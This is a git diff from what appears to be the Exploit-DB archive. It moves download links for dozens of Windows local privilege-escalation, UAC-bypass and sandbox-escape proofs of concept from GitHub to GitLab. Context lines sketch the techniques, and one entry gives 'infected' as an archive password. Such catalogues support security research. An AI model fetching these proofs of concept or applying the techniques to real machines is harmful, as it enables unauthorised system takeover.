--- a/exploits/windows/local/44888.txt +++ b/exploits/windows/local/44888.txt @@ -55,4 +55,4 @@ The second process creates a new process and the third process in the chain show Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44888.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44888.zip \ No newline at end of file diff --git a/exploits/windows/local/44906.txt b/exploits/windows/local/44906.txt index 857bc8999..12bd3b482 100644 --- a/exploits/windows/local/44906.txt +++ b/exploits/windows/local/44906.txt @@ -8,4 +8,4 @@ The keywords "COM" and "serialized" pretty much jumped into my face when the adv Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44906.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44906.zip \ No newline at end of file diff --git a/exploits/windows/local/45244.txt b/exploits/windows/local/45244.txt index 9574bd51f..5e06e13ce 100644 --- a/exploits/windows/local/45244.txt +++ b/exploits/windows/local/45244.txt @@ -49,4 +49,4 @@ https://github.com/atredispartners/advisories/blob/master/ATREDIS-2018-0004.md Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45244.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45244.zip \ No newline at end of file diff --git a/exploits/windows/local/45280.txt b/exploits/windows/local/45280.txt index 48f0e8e0b..de519e8d3 100644 --- a/exploits/windows/local/45280.txt +++ b/exploits/windows/local/45280.txt @@ -52,4 +52,4 @@ Included a new video demo, you should see those results while reproducing (teste Again, if anything needs changing, needs extra features, or if you need a more reliable hijacking vector, just let me know. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45280.rar \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45280.rar \ No newline at end of file diff --git a/exploits/windows/local/45675.md b/exploits/windows/local/45675.md index e9928f3a5..dfe330e30 100644 --- a/exploits/windows/local/45675.md +++ b/exploits/windows/local/45675.md @@ -13,5 +13,5 @@ Root cause is basically just a delete without impersonation because of an early Exploitation wise... you either try to trigger DLL hijacking issues in 3rd party software.. or delete temp files used by a system service in c:\windows\temp and hijack them and hopefully do some evil stuff. -EDB Note ~ Source: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45675-1.rar -EDB Note ~ Binary: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45675-2.exe +EDB Note ~ Source: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45675-1.rar +EDB Note ~ Binary: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45675-2.exe \ No newline at end of file diff --git a/exploits/windows/local/45893.txt b/exploits/windows/local/45893.txt index 9b68b85d5..b2ef64108 100644 --- a/exploits/windows/local/45893.txt +++ b/exploits/windows/local/45893.txt @@ -101,4 +101,4 @@ Fixed in https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45893.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45893.zip \ No newline at end of file diff --git a/exploits/windows/local/45961.txt b/exploits/windows/local/45961.txt index 34fd40fb9..734dba8fd 100644 --- a/exploits/windows/local/45961.txt +++ b/exploits/windows/local/45961.txt @@ -72,4 +72,4 @@ An arbitrary binary with the name tmpXXX.tmp.exe is executing as SYSTEM. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45961.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45961.zip \ No newline at end of file diff --git a/exploits/windows/local/46028.txt b/exploits/windows/local/46028.txt index 3ebc46449..7a725c169 100644 --- a/exploits/windows/local/46028.txt +++ b/exploits/windows/local/46028.txt @@ -15,4 +15,4 @@ Even without an enumeration vector, this is still bad news, because a lot of doc Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46028.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46028.zip \ No newline at end of file diff --git a/exploits/windows/local/46040.txt b/exploits/windows/local/46040.txt index 07d55946a..aeda9c463 100644 --- a/exploits/windows/local/46040.txt +++ b/exploits/windows/local/46040.txt @@ -20,4 +20,4 @@ If shadow copies are enabled you can obviously steal the SAM and SYSTEM hive I a Maybe there's some other use-cases.. but I'm not very smart, so I don't know. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46040.rar +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46040.rar \ No newline at end of file diff --git a/exploits/windows/local/46051.txt b/exploits/windows/local/46051.txt index a917ded64..477e4fb49 100644 --- a/exploits/windows/local/46051.txt +++ b/exploits/windows/local/46051.txt @@ -1,2 +1,2 @@ -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46051.zip +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46051.zip Password: infected \ No newline at end of file diff --git a/exploits/windows/local/46098.txt b/exploits/windows/local/46098.txt index bbcb09b2d..24dc0e3c0 100644 --- a/exploits/windows/local/46098.txt +++ b/exploits/windows/local/46098.txt @@ -13,4 +13,4 @@ It's a non security issue really. You should have partial control over the write You can also use it to perhaps disable third party AV software.. Windows defender will be harder since those files can only be modified by trusted installer, not even system. -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46098.rar +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46098.rar \ No newline at end of file diff --git a/exploits/windows/local/46104.txt b/exploits/windows/local/46104.txt index 794f888c6..f2034f9ac 100644 --- a/exploits/windows/local/46104.txt +++ b/exploits/windows/local/46104.txt @@ -34,4 +34,4 @@ The file specified is deleted. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46104.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46104.zip \ No newline at end of file diff --git a/exploits/windows/local/46156.txt b/exploits/windows/local/46156.txt index b21a6a809..4007634a6 100644 --- a/exploits/windows/local/46156.txt +++ b/exploits/windows/local/46156.txt @@ -28,4 +28,4 @@ The token is set for session 0 and a new process can be created with that sessio Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46156.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46156.zip \ No newline at end of file diff --git a/exploits/windows/local/46157.txt b/exploits/windows/local/46157.txt index d257960ac..4d5d3e6c1 100644 --- a/exploits/windows/local/46157.txt +++ b/exploits/windows/local/46157.txt @@ -34,4 +34,4 @@ The file is opened and a writable handle is returned to the user. The PoC will p Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46157.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46157.zip \ No newline at end of file diff --git a/exploits/windows/local/46158.txt b/exploits/windows/local/46158.txt index 74848d6dd..925278ecd 100644 --- a/exploits/windows/local/46158.txt +++ b/exploits/windows/local/46158.txt @@ -33,4 +33,4 @@ The file specified is deleted. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46158.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46158.zip \ No newline at end of file diff --git a/exploits/windows/local/46159.txt b/exploits/windows/local/46159.txt index de8ee2a8a..1cd9a4671 100644 --- a/exploits/windows/local/46159.txt +++ b/exploits/windows/local/46159.txt @@ -31,4 +31,4 @@ The UNC path is opened. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46159.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46159.zip \ No newline at end of file diff --git a/exploits/windows/local/46160.txt b/exploits/windows/local/46160.txt index 6c2279886..d870b3f10 100644 --- a/exploits/windows/local/46160.txt +++ b/exploits/windows/local/46160.txt @@ -33,4 +33,4 @@ The call to move file succeeds and the arbitrary file is now ACLS with the Every Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46160.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46160.zip \ No newline at end of file diff --git a/exploits/windows/local/46161.txt b/exploits/windows/local/46161.txt index 3e6c3c785..0e873cca6 100644 --- a/exploits/windows/local/46161.txt +++ b/exploits/windows/local/46161.txt @@ -47,4 +47,4 @@ The PoC is running in another user’s session. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46161.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46161.zip \ No newline at end of file diff --git a/exploits/windows/local/46162.txt b/exploits/windows/local/46162.txt index efba90bdc..ab90dadfc 100644 --- a/exploits/windows/local/46162.txt +++ b/exploits/windows/local/46162.txt @@ -63,4 +63,4 @@ The broker creation succeeds and notepad executes outside the sandbox. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46162.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46162.zip \ No newline at end of file diff --git a/exploits/windows/local/46185.txt b/exploits/windows/local/46185.txt index 1a4195993..54fd274a6 100644 --- a/exploits/windows/local/46185.txt +++ b/exploits/windows/local/46185.txt @@ -71,4 +71,4 @@ Notepad executes outside the sandbox. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46185.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46185.zip \ No newline at end of file diff --git a/exploits/windows/local/4625.txt b/exploits/windows/local/4625.txt index 17af95249..1c25353a2 100644 --- a/exploits/windows/local/4625.txt +++ b/exploits/windows/local/4625.txt @@ -26,7 +26,7 @@ do not use the exploit for attacking. The attached file is at: http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar - Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar) + Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar) MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6 diff --git a/exploits/windows/local/46536.txt b/exploits/windows/local/46536.txt index bf6ff0ec5..2f4524a96 100644 --- a/exploits/windows/local/46536.txt +++ b/exploits/windows/local/46536.txt @@ -31,4 +31,4 @@ Download PoC (in ZIP archive) with full details from: https://onedrive.live.com/ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46536.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46536.zip \ No newline at end of file diff --git a/exploits/windows/local/46600.txt b/exploits/windows/local/46600.txt index 38eae677b..62eb1aad4 100644 --- a/exploits/windows/local/46600.txt +++ b/exploits/windows/local/46600.txt @@ -28,4 +28,4 @@ The VMX process is a fake one provided by the PoC which allows access to secured Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46600.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46600.zip \ No newline at end of file diff --git a/exploits/windows/local/46601.txt b/exploits/windows/local/46601.txt index ce4d4a7e3..5c231b6d3 100644 --- a/exploits/windows/local/46601.txt +++ b/exploits/windows/local/46601.txt @@ -37,4 +37,4 @@ The VMX process loads the hijack DLL into memory and a dialog box appears provin Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46601.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46601.zip \ No newline at end of file diff --git a/exploits/windows/local/46712.txt b/exploits/windows/local/46712.txt index 2d2faf2ed..92a52b18b 100644 --- a/exploits/windows/local/46712.txt +++ b/exploits/windows/local/46712.txt @@ -47,4 +47,4 @@ The manifest file is hijacked, an arbitrary DLL is loaded into a privileged proc Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46712.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46712.zip \ No newline at end of file diff --git a/exploits/windows/local/46713.txt b/exploits/windows/local/46713.txt index 3647efac0..4eee0c7db 100644 --- a/exploits/windows/local/46713.txt +++ b/exploits/windows/local/46713.txt @@ -52,4 +52,4 @@ The virtualization operation succeeds with the string “FAKE CONTENT” written Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46713.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46713.zip \ No newline at end of file diff --git a/exploits/windows/local/46714.txt b/exploits/windows/local/46714.txt index 4aa36f0f8..59d8f9030 100644 --- a/exploits/windows/local/46714.txt +++ b/exploits/windows/local/46714.txt @@ -39,4 +39,4 @@ The virtualization operation succeeds and the file c:\windows\dummy.txt is creat Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46714.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46714.zip \ No newline at end of file diff --git a/exploits/windows/local/46715.txt b/exploits/windows/local/46715.txt index c39e40409..60d45bb93 100644 --- a/exploits/windows/local/46715.txt +++ b/exploits/windows/local/46715.txt @@ -67,4 +67,4 @@ The virtualization operation succeeds and the file has an arbitrary short name. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46715.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46715.zip \ No newline at end of file diff --git a/exploits/windows/local/46716.txt b/exploits/windows/local/46716.txt index d826c3ce7..8e4f790a7 100644 --- a/exploits/windows/local/46716.txt +++ b/exploits/windows/local/46716.txt @@ -36,4 +36,4 @@ The an arbitrary file is cached signed and can be loaded with an elevated proces Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46716.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46716.zip \ No newline at end of file diff --git a/exploits/windows/local/46717.txt b/exploits/windows/local/46717.txt index 74e86bb63..3205176f2 100644 --- a/exploits/windows/local/46717.txt +++ b/exploits/windows/local/46717.txt @@ -53,4 +53,4 @@ The virtualization poisoned the contents of license.rtf with a new text string. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46717.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46717.zip \ No newline at end of file diff --git a/exploits/windows/local/46718.txt b/exploits/windows/local/46718.txt index cb51b59ab..a620e3249 100644 --- a/exploits/windows/local/46718.txt +++ b/exploits/windows/local/46718.txt @@ -46,4 +46,4 @@ The mapped data is the actual license.rtf file and it’s mapped writable. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46718.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46718.zip \ No newline at end of file diff --git a/exploits/windows/local/46912.txt b/exploits/windows/local/46912.txt index d0a9054b0..f891bab3a 100644 --- a/exploits/windows/local/46912.txt +++ b/exploits/windows/local/46912.txt @@ -55,4 +55,4 @@ There’s a few places that call CmVirtualKCBToRealPath so I’d probably check Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46912.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46912.zip \ No newline at end of file diff --git a/exploits/windows/local/46916.txt b/exploits/windows/local/46916.txt index 09adea88d..3b938b12a 100644 --- a/exploits/windows/local/46916.txt +++ b/exploits/windows/local/46916.txt @@ -27,4 +27,4 @@ The mount point on c:\config.msi has to be create after querynetworkfile and bef -EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46916.zip +EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46916.zip \ No newline at end of file diff --git a/exploits/windows/local/46917.txt b/exploits/windows/local/46917.txt index 450905912..35663c540 100644 --- a/exploits/windows/local/46917.txt +++ b/exploits/windows/local/46917.txt @@ -48,4 +48,4 @@ After many long minutes it should stop and c:\windows\system32\drivers\pci.sys s Again.. I have only tested this on both my VM and host, I don't even know if the random delay range will work on other hardware setups (it basically tries to bruteforce the correct timing).. so I hope you can repo it. -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46917.zip \ No newline at end of file +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46917.zip \ No newline at end of file diff --git a/exploits/windows/local/46919.txt b/exploits/windows/local/46919.txt index 4a3303bb7..ea74465d4 100644 --- a/exploits/windows/local/46919.txt +++ b/exploits/windows/local/46919.txt @@ -4,4 +4,4 @@ Will work on other sandboxes that allow the opening of windows filepickers throu You will gain medium IL javascript execution, at which point you simply retrigger your IE RCE bug. -EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46919.zip \ No newline at end of file +EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46919.zip \ No newline at end of file diff --git a/exploits/windows/local/46920.txt b/exploits/windows/local/46920.txt index 5dd4bb7f2..cd599c92c 100644 --- a/exploits/windows/local/46920.txt +++ b/exploits/windows/local/46920.txt @@ -6,4 +6,4 @@ Reference (steal Security token) https://github.com/mwrlabs/CVE-2016-7255 -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip \ No newline at end of file +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46920.zip \ No newline at end of file diff --git a/exploits/windows/local/46938.txt b/exploits/windows/local/46938.txt index 26706fb16..b2c592df0 100644 --- a/exploits/windows/local/46938.txt +++ b/exploits/windows/local/46938.txt @@ -25,4 +25,4 @@ To repro: Use the vide demo as guidance.. -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46938.zip \ No newline at end of file +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46938.zip \ No newline at end of file diff --git a/exploits/windows/local/46945.cpp b/exploits/windows/local/46945.cpp index e0867a2ad..3ad71150e 100644 --- a/exploits/windows/local/46945.cpp +++ b/exploits/windows/local/46945.cpp @@ -1,6 +1,6 @@ #include "hd.h" -// EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar +// EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46945.rar byte __s_code[]={ diff --git a/exploits/windows/local/46976.txt b/exploits/windows/local/46976.txt index b7d2dba29..de2f0ad91 100644 --- a/exploits/windows/local/46976.txt +++ b/exploits/windows/local/46976.txt @@ -31,4 +31,4 @@ It's going to increase the thread priority to increase our odds of winning the r -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46976.zip \ No newline at end of file +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46976.zip \ No newline at end of file diff --git a/exploits/windows/local/47115.txt b/exploits/windows/local/47115.txt index 153c994fa..b6b29daa6 100644 --- a/exploits/windows/local/47115.txt +++ b/exploits/windows/local/47115.txt @@ -61,4 +61,4 @@ https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47115.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47115.zip \ No newline at end of file diff --git a/exploits/windows/local/47135.txt b/exploits/windows/local/47135.txt index 92da2fb86..a9397d3fb 100644 --- a/exploits/windows/local/47135.txt +++ b/exploits/windows/local/47135.txt @@ -37,4 +37,4 @@ The actkernel RPC service grants access Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47135.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47135.zip \ No newline at end of file diff --git a/exploits/windows/local/47258.txt b/exploits/windows/local/47258.txt index 32d36e9eb..c1958b450 100644 --- a/exploits/windows/local/47258.txt +++ b/exploits/windows/local/47258.txt @@ -353,4 +353,4 @@ Please note, if you *only* have languages installed that doesn't use an Out-of-p Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47258.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47258.zip \ No newline at end of file diff --git a/exploits/windows/local/47306.txt b/exploits/windows/local/47306.txt index 6bfdf5917..6835eaa3f 100644 --- a/exploits/windows/local/47306.txt +++ b/exploits/windows/local/47306.txt @@ -30,4 +30,4 @@ The mount point is set to an arbitrary directory. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47306.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47306.zip \ No newline at end of file diff --git a/exploits/windows/local/47684.md b/exploits/windows/local/47684.md index c1ef04fd9..f6681da14 100644 --- a/exploits/windows/local/47684.md +++ b/exploits/windows/local/47684.md @@ -1,7 +1,7 @@ ## EDB Note Download: -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47684-1.exe +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47684-2.zip # COMahawk diff --git a/exploits/windows/local/47714.md b/exploits/windows/local/47714.md index 58b802b9e..e67c2edeb 100644 --- a/exploits/windows/local/47714.md +++ b/exploits/windows/local/47714.md @@ -22,4 +22,4 @@ Test on VMware 12.5.2 build-4638234  -EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47714.zip +EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47714.zip \ No newline at end of file diff --git a/exploits/windows/local/47715.md b/exploits/windows/local/47715.md index dc47ef5b6..a10394911 100644 --- a/exploits/windows/local/47715.md +++ b/exploits/windows/local/47715.md @@ -25,4 +25,4 @@ Test on VMware 12.5.2 build-4638234 * https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/ -EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47715.zip \ No newline at end of file +EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47715.zip \ No newline at end of file diff --git a/exploits/windows/local/47753.md b/exploits/windows/local/47753.md index ec558a896..025ba30df 100644 --- a/exploits/windows/local/47753.md +++ b/exploits/windows/local/47753.md @@ -1,4 +1,4 @@ Windows 10 UAC bypass for all executable files which are autoelevate true. https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47753.zip \ No newline at end of file +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47753.zip \ No newline at end of file diff --git a/exploits/windows/local/47754.py b/exploits/windows/local/47754.py index 24a919e96..e3dff92b7 100755 --- a/exploits/windows/local/47754.py +++ b/exploits/windows/local/47754.py @@ -2,7 +2,7 @@ #### @404death #### base on : https://www.activecyber.us/activelabs/windows-uac-bypass # -## EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47754.zip +## EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47754.zip # import sys, os from ctypes import * diff --git a/exploits/windows/local/47755.c b/exploits/windows/local/47755.c index c0234a22d..1e65b8982 100644 --- a/exploits/windows/local/47755.c +++ b/exploits/windows/local/47755.c @@ -2,7 +2,7 @@ #include<stdio.h> // uac bypass via wsreset.exe // @404death -// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47755.zip +// EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47755.zip int main() diff --git a/exploits/windows/local/47831.txt b/exploits/windows/local/47831.txt index 112c758d2..b5fef1f33 100644 --- a/exploits/windows/local/47831.txt +++ b/exploits/windows/local/47831.txt @@ -63,5 +63,4 @@ Successfully processed 1 files; Failed processing 0 files [ Exploit -Privilege Escalation ] ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable -malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation) - +malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation) \ No newline at end of file diff --git a/exploits/windows/local/47933.rb b/exploits/windows/local/47933.rb index 14011eed6..190718970 100755 --- a/exploits/windows/local/47933.rb +++ b/exploits/windows/local/47933.rb @@ -1,4 +1,4 @@ -# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47933.zip +# EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47933.zip require 'openssl' diff --git a/exploits/windows/local/48071.md b/exploits/windows/local/48071.md index ece06f069..a5ffe53a2 100644 --- a/exploits/windows/local/48071.md +++ b/exploits/windows/local/48071.md @@ -24,4 +24,4 @@ This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA [Video Recording of presentation at Black Hat USA, 2019](https://www.youtube.com/watch?v=uBPry7jcfBE) -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48071.zip \ No newline at end of file +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48071.zip \ No newline at end of file diff --git a/exploits/windows/local/48267.txt b/exploits/windows/local/48267.txt index fa4b94c32..712e554c7 100644 --- a/exploits/windows/local/48267.txt +++ b/exploits/windows/local/48267.txt @@ -19,4 +19,4 @@ Windows SMBv3 LPE Exploit * https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/ -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip \ No newline at end of file +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48267.zip \ No newline at end of file diff --git a/exploits/windows/local/50653.txt b/exploits/windows/local/50653.txt index f4fc336e2..8744717a6 100644 --- a/exploits/windows/local/50653.txt +++ b/exploits/windows/local/50653.txt @@ -50,17 +50,17 @@ Lets begin... My original .Reg file spoofing payload of 2019, now triggers an access violation and crashes regedit.exe from invalid pointer read. -00007FFE7A4A7C83 | EB 0D | jmp ntdll.7FFE7A4A7C92 | -00007FFE7A4A7C85 | FF C9 | dec ecx | ;This loops thru to read in the path + filename -00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE -00007FFE7A4A7C8C | 74 08 | je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes -00007FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" -00007FFE7A4A7C92 | 85 C9 | test ecx,ecx +00007FFE7A4A7C83 | EB 0D | jmp ntdll.7FFE7A4A7C92 | +00007FFE7A4A7C85 | FF C9 | dec ecx | ;This loops thru to read in the path + filename +00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ;ACCESS VIOLATION HERE +00007FFE7A4A7C8C | 74 08 | je ntdll.7FFE7A4A7C96 | ;Move the string down two bytes +00007FFE7A4A7C8E | 49 83 C5 02 | add r13,2 | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" +00007FFE7A4A7C92 | 85 C9 | test ecx,ecx -00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7 +00007FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w | ; BOOM ACCESS VIOLATION on Win10, but not Win7 ntdll!woutput_l+0x387: -00007ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:000001ed`00000000=???? 